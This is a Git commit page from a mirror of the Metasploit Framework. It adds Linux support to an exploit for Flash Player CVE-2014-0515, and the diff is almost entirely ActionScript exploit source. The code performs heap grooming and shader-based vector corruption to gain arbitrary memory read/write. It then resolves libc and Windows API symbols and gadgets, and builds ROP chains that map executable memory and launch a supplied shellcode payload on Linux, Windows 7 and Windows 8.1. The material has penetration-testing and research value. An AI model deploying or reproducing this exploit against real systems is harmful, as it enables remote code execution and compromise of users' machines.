infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add linux support for CVE-2014-0515

bug/bundler_fix
jvazquez-r7 2015-06-11 16:18:50 -05:00
parent 4c5b1fbcef
commit 8ed13b1d1b
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
17 changed files with 1221 additions and 456 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2014-0515/Graph.swf
View File

Binary file not shown.

BIN
data/exploits/CVE-2014-0515/msf.swf Normal file
View File

Binary file not shown.

235
external/source/exploits/CVE-2014-0515/Elf.as vendored Normal file
View File

@ -0,0 +1,235 @@
package
{
public class Elf
{
private const PT_DYNAMIC:uint = 2
private const PT_LOAD:uint = 1
private const PT_READ_EXEC:uint = 5
private const DT_SYMTAB:uint = 6
private const DT_STRTAB:uint = 5
private const DT_PLTGOT:uint = 3
private var e_ba:ExploitByteArray
// elf base address
public var base:uint = 0
// program header address
public var ph:uint = 0
// number of program headers
public var ph_size:uint = 0
// program header entry size
public var ph_esize:uint = 0
// DYNAMIC segment address
public var seg_dynamic:uint = 0
// DYNAMIC segment size
public var seg_dynamic_size:uint = 0
// CODE segment address
public var seg_exec:uint = 0
// CODE segment size
public var seg_exec_size:uint = 0
// .dynsyn section address
public var sec_dynsym:uint = 0
// .synstr section address
public var sec_dynstr:uint = 0
// .got.plt section address
public var sec_got_plt:uint = 0
public function Elf(ba:ExploitByteArray, addr:uint)
{
e_ba = ba
set_base(addr)
set_program_header()
set_program_header_size()
set_program_header_entry_size()
set_dynamic_segment()
set_exec_segment()
set_dynsym()
set_dynstr()
set_got_plt()
}
public function external_symbol(name:String):uint {
var entry:uint = 0
var st_name:uint = 0
var st_value:uint = 0
var st_size:uint = 0
var st_info:uint = 0
var st_other:uint = 0
var st_shndx:uint = 0
var st_string:String = ""
var got_plt_index:uint = 0
for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
entry = sec_dynsym + 0x10 + (i * 0x10)
st_name = e_ba.read(entry)
st_value = e_ba.read(entry + 4)
st_info = e_ba.read(entry + 0xc, "byte")
st_string = e_ba.read_string(sec_dynstr + st_name)
if (st_string == name) {
return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
}
if (st_info != 0x11) {
got_plt_index++
}
}
throw new Error()
}
public function symbol(name:String):uint {
var entry:uint = 0
var st_name:uint = 0
var st_value:uint = 0
var st_size:uint = 0
var st_info:uint = 0
var st_other:uint = 0
var st_shndx:uint = 0
var st_string:String = ""
for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
entry = sec_dynsym + 0x10 + (i * 0x10)
st_name = e_ba.read(entry)
st_value = e_ba.read(entry + 4)
st_info = e_ba.read(entry + 0xc, "byte")
st_string = e_ba.read_string(sec_dynstr + st_name)
if (st_string == name) {
return base + st_value
}
}
throw new Error()
}
public function gadget(gadget:String, hint:uint):uint
{
var value:uint = parseInt(gadget, 16)
var contents:uint = 0
for (var i:uint = 0; i < seg_exec_size - 4; i++) {
contents = e_ba.read(seg_exec + i)
if (hint == 0xffffffff && value == contents) {
return seg_exec + i
}
if (hint != 0xffffffff && value == (contents & hint)) {
return seg_exec + i
}
}
throw new Error()
}
private function set_base(addr:uint):void
{
addr &= 0xffff0000
while (true) {
if (e_ba.read(addr) == 0x464c457f) {
base = addr
return
}
addr -= 0x1000
}
throw new Error()
}
private function set_program_header():void
{
ph = base + e_ba.read(base + 0x1c)
}
private function set_program_header_size():void
{
ph_size = e_ba.read(base + 0x2c, "word")
}
private function set_program_header_entry_size():void
{
ph_esize = e_ba.read(base + 0x2a, "word")
}
private function set_dynamic_segment():void
{
var entry:uint = 0
var p_type:uint = 0
for (var i:uint = 0; i < ph_size; i++) {
entry = ph + (i * ph_esize)
p_type = e_ba.read(entry)
if (p_type == PT_DYNAMIC) {
seg_dynamic = base + e_ba.read(entry + 8)
seg_dynamic_size = e_ba.read(entry + 0x14)
return
}
}
throw new Error()
}
private function set_exec_segment():void
{
var entry:uint = 0
var p_type:uint = 0
var p_flags:uint = 0
for (var i:uint = 0; i < ph_size; i++) {
entry = ph + (i * ph_esize)
p_type = e_ba.read(entry)
p_flags = e_ba.read(entry + 0x18)
if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
seg_exec = base + e_ba.read(entry + 8)
seg_exec_size = e_ba.read(entry + 0x14)
return
}
}
throw new Error()
}
private function set_dynsym():void
{
var entry:uint = 0
var s_type:uint = 0
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
entry = seg_dynamic + i
s_type = e_ba.read(entry)
if (s_type == DT_SYMTAB) {
sec_dynsym = e_ba.read(entry + 4)
return
}
}
throw new Error()
}
private function set_dynstr():void
{
var entry:uint = 0
var s_type:uint = 0
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
entry = seg_dynamic + i
s_type = e_ba.read(entry)
if (s_type == DT_STRTAB) {
sec_dynstr = e_ba.read(entry + 4)
return
}
}
throw new Error()
}
private function set_got_plt():void
{
var entry:uint = 0
var s_type:uint = 0
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
entry = seg_dynamic + i
s_type = e_ba.read(entry)
if (s_type == DT_PLTGOT) {
sec_got_plt = e_ba.read(entry + 4)
return
}
}
throw new Error()
}
}
}

140
external/source/exploits/CVE-2014-0515/Exploit.as vendored Executable file
View File

@ -0,0 +1,140 @@
//compile with AIR SDK 13.0: mxmlc Exploit.as -o Exploit.swf
package {
import flash.display.Sprite
import flash.utils.ByteArray
import flash.display.Shader
import flash.system.Capabilities
import flash.utils.Endian
import __AS3__.vec.Vector
import __AS3__.vec.*
import flash.display.LoaderInfo
import mx.utils.Base64Decoder
public class Exploit extends Sprite {
protected var Shad:Class
private var uv:Vector.<uint>
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
private var os:String
private var exploiter:Exploiter
public function Exploit(){
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
os = LoaderInfo(this.root.loaderInfo).parameters.os
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray()
var shader:Shader
if (platform == "linux") {
this.Shad = GraphShadLinux
} else {
this.Shad = GraphShadWindows
}
super()
var i:* = 0
var j:* = 0
var offset:int = -1
var corrupted_vector_idx:int = -1
// Memory massage
Logger.log("Memory massage")
var array_length:uint = 0x10000
var vector_size:uint = 34
var array:Array = new Array()
i = 0
while (i < array_length)
{
array[i] = new Vector.<uint>(vector_size)
i++;
}
i = 0
while (i < array_length)
{
array[i].length = 0
i++
}
i = 0x0200
while (i < array_length)
{
array[(i - (2 * (j % 2)))].length = 0x0100
array[(i - (2 * (j % 2)))][0] = 0xdeedbeef
array[(i - (2 * (j % 2)))][1] = 0xdeadbeef
array[(i - (2 * (j % 2)))][2] = (i - (2 * (j % 2)))
i = (i + 28)
j++
}
// Overflow and Search for corrupted vector
Logger.log("Overflow and Search for corrupted vector")
var shadba:ByteArray = (new this.Shad() as ByteArray)
shadba.position = 232
if (Capabilities.os.indexOf("Windows 8") >= 0)
{
shadba.writeUnsignedInt(2472)
}
shadba.position = 0
Logger.log("corrupting")
shader = new Shader()
try
{
shader.byteCode = (new this.Shad() as ByteArray);
} catch(e) { }
i = 0
while (i < array_length)
{
if (array[i].length > 0x0100)
{
corrupted_vector_idx = i
break
}
i++
}
if (corrupted_vector_idx == -1) {
Logger.log("Exploit - Corrupted vector not found.")
return
}
for(i = 0; i < array[corrupted_vector_idx].length; i++) {
if (array[corrupted_vector_idx][i] == 0x0100 && array[corrupted_vector_idx][i + 2] == 0xdeedbeef) {
Logger.log("w00t!, found, corrupting ")
array[corrupted_vector_idx][i] = 0xffffffff
offset = i
break
}
}
if (offset == -1) {
Logger.log("Exploit - Secondary vector not corrupted")
return
}
for(i = 0; i < array.length; i++) {
if (array[i].length == 0xffffffff) {
Logger.log("super corrupted found")
uv = array[i]
Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
uv[0x3ffffffc - offset] = 34
Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
}
}
Logger.log('done? Exploiting!')
exploiter = new Exploiter(this, platform, os, payload, uv)
// uv[0x3ffffffe] = 0x100
// Logger.log(uv.length.toString())
}
}
}//package

85
external/source/exploits/CVE-2014-0515/ExploitByteArray.as vendored Normal file
View File

@ -0,0 +1,85 @@
package
{
import flash.utils.ByteArray
public class ExploitByteArray
{
private const MAX_STRING_LENGTH:uint = 100
public var ba:ByteArray
public var original_length:uint
private var platform:String
public function ExploitByteArray(p:String, l:uint = 1024)
{
ba = new ByteArray()
ba.length = l
ba.endian = "littleEndian"
ba.writeUnsignedInt(0)
platform = p
original_length = l
}
public function set_length(length:uint):void
{
ba.length = length
}
public function get_length():uint
{
return ba.length
}
public function lets_ready():void
{
ba.endian = "littleEndian"
if (platform == "linux") {
ba.length = 0xffffffff
}
}
public function is_ready():Boolean
{
if (ba.length == 0xffffffff)
return true
return false
}
public function read(addr:uint, type:String = "dword"):uint
{
ba.position = addr
switch(type) {
case "dword":
return ba.readUnsignedInt()
case "word":
return ba.readUnsignedShort()
case "byte":
return ba.readUnsignedByte()
}
return 0
}
public function read_string(addr:uint, length:uint = 0):String
{
ba.position = addr
if (length == 0)
return ba.readUTFBytes(MAX_STRING_LENGTH)
else
return ba.readUTFBytes(length)
}
public function write(addr:uint, value:* = 0, zero:Boolean = true):void
{
var i:uint
if (addr) ba.position = addr
if (value is String) {
for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
if (zero) ba.writeByte(0)
} else if (value is ByteArray) {
var value_length:uint = value.length
for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
} else ba.writeUnsignedInt(value)
}
}
}

74
external/source/exploits/CVE-2014-0515/ExploitVector.as vendored Normal file
View File

@ -0,0 +1,74 @@
package
{
public class ExploitVector
{
private var uv:Vector.<uint>
public var original_length:uint = 0x100
public function ExploitVector(v:Vector.<uint>)
{
uv = v
}
public function restore():void
{
uv[0x3ffffffe] = original_length
}
public function is_ready():Boolean
{
if (uv.length > original_length)
{
return true
}
return false
}
public function at(pos:uint):uint
{
return uv[pos]
}
// pos: position where a Vector.<Object>[0] lives
public function set_own_address(pos:uint):void
{
uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
}
public function read(addr:uint):uint
{
var pos:uint = 0
if (addr > uv[0]) {
pos = ((addr - uv[0]) / 4) - 2
} else {
pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
}
return uv[pos]
}
public function write(addr:uint, value:uint = 0):void
{
var pos:uint = 0
if (addr > uv[0]) {
pos = ((addr - uv[0]) / 4) - 2
} else {
pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
}
uv[pos] = value
}
public function search_pattern(pattern:uint, limit:uint):uint
{
for (var i:uint = 0; i < limit/4; i++) {
if (uv[i] == pattern) {
return i
}
}
throw new Error()
}
}
}

399
external/source/exploits/CVE-2014-0515/Exploiter.as vendored Normal file
View File

@ -0,0 +1,399 @@
package
{
import flash.utils.ByteArray
import flash.system.System
public class Exploiter
{
private const VECTOR_OBJECTS_LENGTH:uint = 1014
private var exploit:Exploit
private var ev:ExploitVector
private var eba:ExploitByteArray
private var payload:ByteArray
private var platform:String
private var op_system:String
private var pos:uint
private var byte_array_object:uint
private var main:uint
private var stack_object:uint
private var payload_space_object:uint
private var buffer_object:uint
private var buffer:uint
private var vtable:uint
private var stack_address:uint
private var payload_address:uint
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
private var spray:Vector.<Object> = new Vector.<Object>(90000)
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
{
exploit = exp
payload = p
platform = pl
op_system = os
ev = new ExploitVector(uv)
if (!ev.is_ready()) return
eba = new ExploitByteArray(platform)
spray_objects()
try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
ev.set_own_address(pos)
if (!disclose_objects()) { ev.restore(); cleanup(); return; }
disclose_addresses()
corrupt_byte_array()
if (!eba.is_ready()) { ev.restore(); cleanup(); return }
do_rop()
restore_byte_array()
ev.restore()
cleanup()
}
private function spray_objects():void
{
Logger.log("[*] Exploiter - spray_objects()")
for (var i:uint = 0; i < spray.length; i++)
{
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
spray[i][0] = eba.ba
spray[i][1] = exploit
spray[i][2] = stack
spray[i][3] = payload_space
}
}
private function search_objects():uint
{
Logger.log("[*] Exploiter - search_objects()")
var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
return idx + 1
}
private function disclose_objects():Boolean
{
Logger.log("[*] Exploiter - disclose_objects()")
byte_array_object = ev.at(pos) - 1
main = ev.at(pos + 1) - 1
stack_object = ev.at(pos + 2) - 1
payload_space_object = ev.at(pos + 3) - 1
if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
return false
}
return true
}
private function disclose_addresses():void
{
Logger.log("[*] Exploiter - disclose_addresses()")
if (platform == "linux")
{
buffer_object = ev.read(byte_array_object + 0x10)
buffer = ev.read(buffer_object + 0x1c)
}
else if (platform == "win")
{
buffer_object = ev.read(byte_array_object + 0x40)
buffer = ev.read(buffer_object + 8)
}
vtable = ev.read(main)
stack_address = ev.read(stack_object + 0x18)
payload_address = ev.read(payload_space_object + 0x18)
}
private function corrupt_byte_array():void
{
Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
if (platform == "linux")
{
ev.write(buffer_object + 0x1c) // *array
ev.write(buffer_object + 0x20, 0xffffffff) // capacity
}
else if (platform == "win")
{
ev.write(buffer_object + 8) // *array
ev.write(buffer_object + 16, 0xffffffff) // capacity
}
eba.lets_ready()
}
private function restore_byte_array():void
{
Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
if (platform == "linux")
{
ev.write(buffer_object + 0x1c, buffer) // *array
ev.write(buffer_object + 0x20, 1024) // capacity
}
else if (platform == "win")
{
ev.write(buffer_object + 8, buffer) // *array
ev.write(buffer_object + 16, 1024) // capacity
}
eba.set_length(eba.original_length)
}
private function do_rop():void
{
Logger.log("[*] Exploiter - do_rop()")
if (platform == "linux") {
do_rop_linux()
} else if (platform == "win") {
if (op_system == "Windows 8.1") {
do_rop_windows8()
} else if (op_system == "Windows 7") {
do_rop_windows()
} else {
return
}
} else {
return
}
}
private function do_rop_windows():void
{
Logger.log("[*] Exploiter - do_rop_windows()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
var createthread:uint = pe.procedure("CreateThread", kernel32)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
}
private function do_rop_windows8():void
{
Logger.log("[*] Exploiter - do_rop_windows8()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var advapi32:uint = pe.module("advapi32.dll", flash)
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
var createthread:uint = pe.procedure("CreateThread", kernelbase)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload
// Put the fake vtabe / stack on memory
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
eba.write(0, virtualprotect)
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7ffd0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7ffd0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)
// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7ffd0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
exploit.toString() // call method in the fake vtable
}
private function do_rop_linux():void
{
Logger.log("[*] Exploiter - do_rop_linux()")
var flash:Elf = new Elf(eba, vtable)
var feof:uint = flash.external_symbol('feof')
var libc:Elf = new Elf(eba, feof)
var popen:uint = libc.symbol("popen")
var mprotect:uint = libc.symbol("mprotect")
var mmap:uint = libc.symbol("mmap")
var clone:uint = libc.symbol("clone")
var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
// Continuation of execution
// 1) Recover original vtable
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
eba.write(0, "\x89\x03", false) // mov [ebx], eax
// 2) Recover original stack
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
// my_memcpy
eba.write(buffer + 0x60, "\x56", false) // push esi
eba.write(0, "\x57", false) // push edi
eba.write(0, "\x51", false) // push ecx
eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
eba.write(0, "\xF3\xA4", false) // rep movsb
eba.write(0, "\x59", false) // pop ecx
eba.write(0, "\x5f", false) // pop edi
eba.write(0, "\x5e", false) // pop esi
eba.write(0, "\xc3", false) // ret
// Put the popen parameters in memory
eba.write(payload_address + 0x8, payload, true) // false
// Put the fake stack/vtable on memory
eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
// Return to mprotect()
eba.write(stack_address + 0x18034, mprotect)
// Return to stackpivot (jmp over mprotect parameters)
eba.write(0, addesp2cret)
// mprotect() arguments
eba.write(0, buffer) // addr
eba.write(0, 0x1000) // size
eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
// Return to mmap()
eba.write(stack_address + 0x18068, mmap)
// Return to stackpivot (jmp over mmap parameters)
eba.write(0, addesp2cret)
// mmap() code segment arguments
eba.write(0, 0x70000000) // 0x70000000
eba.write(0, 0x4000) // size
eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
eba.write(0, 0xffffffff) // filedes
eba.write(0, 0) // offset
// Return to mmap()
eba.write(stack_address + 0x1809c, mmap)
// Return to stackpivot (jmp over mmap parameters)
eba.write(0, addesp2cret)
// mmap() stack segment arguments
eba.write(0, 0x70008000) // NULL
eba.write(0, 0x10000) // size
eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
eba.write(0, -1) // filedes
eba.write(0, 0) // offset
// Return to memcpy()
eba.write(stack_address + 0x180d0, buffer + 0x60)
// Return to stackpivot (jmp over memcpy parameters)
eba.write(0, addesp2cret)
// memcpy() parameters
eba.write(0, 0x70000000)
eba.write(0, payload_address + 0x8)
eba.write(0, payload.length)
// Return to clone()
eba.write(stack_address + 0x18104, clone)
// Return to CoE (fix stack and object vtable)
eba.write(0, buffer + 0x10)
// clone() arguments
eba.write(0, 0x70000000) // code
eba.write(0, 0x7000bff0) // stack
eba.write(0, 0x00000100) // flags CLONE_VM
eba.write(0, 0) // args
//call DWORD PTR [eax+0x24]
//EAX: 0x41414141 ('AAAA')
//EDI: 0xad857088 ("AAAA\377")
eba.write(main, stack_address + 0x18000)
exploit.hasOwnProperty('msf')
}
private function cleanup():void
{
Logger.log("[*] Exploiter - cleanup()")
spray = null
stack = null
payload_space = null
eba = null
ev = null
exploit = null
System.pauseForGCIfCollectionImminent(0)
}
}
}

411
external/source/exploits/CVE-2014-0515/Graph.as vendored
View File

@ -1,411 +0,0 @@
//compile with AIR SDK 13.0: mxmlc Graph.as -o Graph.swf
package {
import flash.display.Sprite;
import flash.utils.ByteArray;
import flash.display.Shader;
import flash.system.Capabilities;
import flash.net.FileReference;
import flash.utils.Endian;
import __AS3__.vec.Vector;
import __AS3__.vec.*;
import flash.display.LoaderInfo;
public class Graph extends Sprite {
static var counter:uint = 0;
protected var Shad:Class;
var shellcode_byte_array:ByteArray;
var aaab:ByteArray;
var shellcodeObj:Array;
public function Graph(){
var tweaked_vector:* = undefined;
var tweaked_vector_address:* = undefined;
var shader:Shader;
var flash_memory_protect:Array;
var code_vectors:Array;
var address_code_vector:uint;
var address_shellcode_byte_array:uint;
this.Shad = Graph_Shad;
super();
shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(",");
var i:* = 0;
var j:* = 0;
// Just one try
counter++;
if (counter > 1)
{
return;
};
// Memory massage
var array_length:uint = 0x10000;
var vector_size:uint = 34;
var array:Array = new Array();
i = 0;
while (i < array_length)
{
array[i] = new Vector.<int>(1);
i++;
};
i = 0;
while (i < array_length)
{
array[i] = new Vector.<int>(vector_size);
i++;
};
i = 0;
while (i < array_length)
{
array[i].length = 0;
i++;
};
i = 0x0200;
while (i < array_length)
{
array[(i - (2 * (j % 2)))].length = 0x0100;
i = (i + 28);
j++;
};
// Overflow and Search for corrupted vector
var corrupted_vector_idx:uint;
var shadba:ByteArray = (new this.Shad() as ByteArray);
shadba.position = 232;
if (Capabilities.os.indexOf("Windows 8") >= 0)
{
shadba.writeUnsignedInt(2472);
};
shadba.position = 0;
while (1)
{
shader = new Shader();
try
{
shader.byteCode = (new this.Shad() as ByteArray);
} catch(e)
{
};
i = 0;
while (i < array_length)
{
if (array[i].length > 0x0100)
{
corrupted_vector_idx = i;
break;
};
i++;
};
if (i != array_length)
{
if (array[corrupted_vector_idx][(vector_size + 1)] > 0) break;
};
array.push(new Vector.<int>(vector_size));
};
// Tweak the vector following the corrupted one
array[corrupted_vector_idx][vector_size] = 0x40000001;
tweaked_vector = array[(corrupted_vector_idx + 1)];
// repair the corrupted vector by restoring its
// vector object pointer and length
var vector_obj_addr:* = tweaked_vector[0x3fffffff];
tweaked_vector[((0x40000000 - vector_size) - 3)] = vector_obj_addr;
tweaked_vector[((0x40000000 - vector_size) - 4)] = vector_size;
i = 0;
var val:uint;
while (true)
{
val = tweaked_vector[(0x40000000 - i)];
if (val == 0x90001B) break;
i++;
};
tweaked_vector_address = 0;
if (tweaked_vector[((0x40000000 - i) - 4)] > 0)
{
tweaked_vector[4] = 0x41414141;
tweaked_vector_address = ((tweaked_vector[((0x40000000 - i) - 4)] + (8 * (vector_size + 2))) + 8);
};
// More memory massage, fill an array of FileReference objects
var file_reference_array:Array = new Array();
i = 0;
while (i < 64)
{
file_reference_array[i] = new FileReference();
i++;
};
var file_reference_vftable:uint = this.find_file_ref_vtable(tweaked_vector, tweaked_vector_address);
var cancel_address:uint = this.read_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20));
var do_it:Boolean = true;
var memory_protect_ptr:uint;
var aaaq:uint;
if (do_it)
{
flash_memory_protect = this.findFlashMemoryProtect(tweaked_vector, tweaked_vector_address);
memory_protect_ptr = flash_memory_protect[0];
aaaq = flash_memory_protect[1]; // Not sure, not used on the Flash 11.7.700.202 analysis, maybe some type of adjustment
code_vectors = this.createCodeVectors(0x45454545, 0x90909090);
address_code_vector = this.findCodeVector(tweaked_vector, tweaked_vector_address, 0x45454545);
this.fillCodeVectors(code_vectors);
tweaked_vector[7] = (memory_protect_ptr + 0); // Flash VirtualProtect call
tweaked_vector[4] = aaaq;
tweaked_vector[0] = 0x1000; // Length
tweaked_vector[1] = (address_code_vector & 0xFFFFF000); // Address
// 10255e21 ff5014 call dword ptr [eax+14h] ds:0023:41414155=????????
this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), (tweaked_vector_address + 8));
// 1) Set memory as executable
i = 0;
while (i < 64)
{
file_reference_array[i].cancel();
i++;
};
// 2) Execute shellcode
tweaked_vector[7] = address_code_vector;
i = 0;
while (i < 64)
{
file_reference_array[i].cancel();
i++;
};
// Restore FileReference cancel function pointer
// Even when probably msf module is not going to benefit because of the ExitThread at the end of the payloads
this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), cancel_address);
};
}
// returns the integer at memory address
// vector: vector with tweaked length
// vector_address: vector's memory address
// address: memory address to read
function read_memory(vector:Vector.<int>, vector_address:uint, address:uint):uint{
if (address >= vector_address)
{
return (vector[((address - vector_address) / 4)]);
};
return (vector[(0x40000000 - ((vector_address - address) / 4))]);
}
function write_memory(vector:Vector.<int>, vector_address:uint, address:uint, value:uint){
if (address >= vector_address)
{
vector[((address - vector_address) / 4)] = value;
} else
{
vector[(0x40000000 - ((vector_address - address) / 4))] = value;
};
}
function findFlashMemoryProtect(vector:*, vector_address:*):Array{
var content:uint;
var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c));
var index:uint;
var memory_protect_ptr:uint;
var _local_6:uint;
if (allocation >= vector_address)
{
index = ((allocation - vector_address) / 4);
} else
{
index = (0x40000000 - ((vector_address - allocation) / 4));
};
//push 1 ; 6a 01
//push dword ptr [eax-8] ; ff 70 f8
//push dword ptr [eax-4] ; ff 70 fc
//call sub_1059DD00 // Will do VirtualProtect
var offset:uint;
while (1)
{
index--;
content = vector[index];
if (content == 0xfff870ff)
{
offset = 2;
break;
};
if (content == 0xf870ff01)
{
offset = 1;
break;
};
if (content == 0x70ff016a)
{
content = vector[(index + 1)];
if (content == 0xfc70fff8)
{
offset = 0;
break;
};
} else
{
if (content == 0x70fff870)
{
offset = 3;
break;
};
};
};
memory_protect_ptr = ((vector_address + (4 * index)) - offset);
index--;
var content_before:uint = vector[index];
if (content_before == 0x16a0424)
{
return ([memory_protect_ptr, _local_6]);
};
if (content_before == 0x6a042444)
{
return ([memory_protect_ptr, _local_6]);
};
if (content_before == 0x424448b)
{
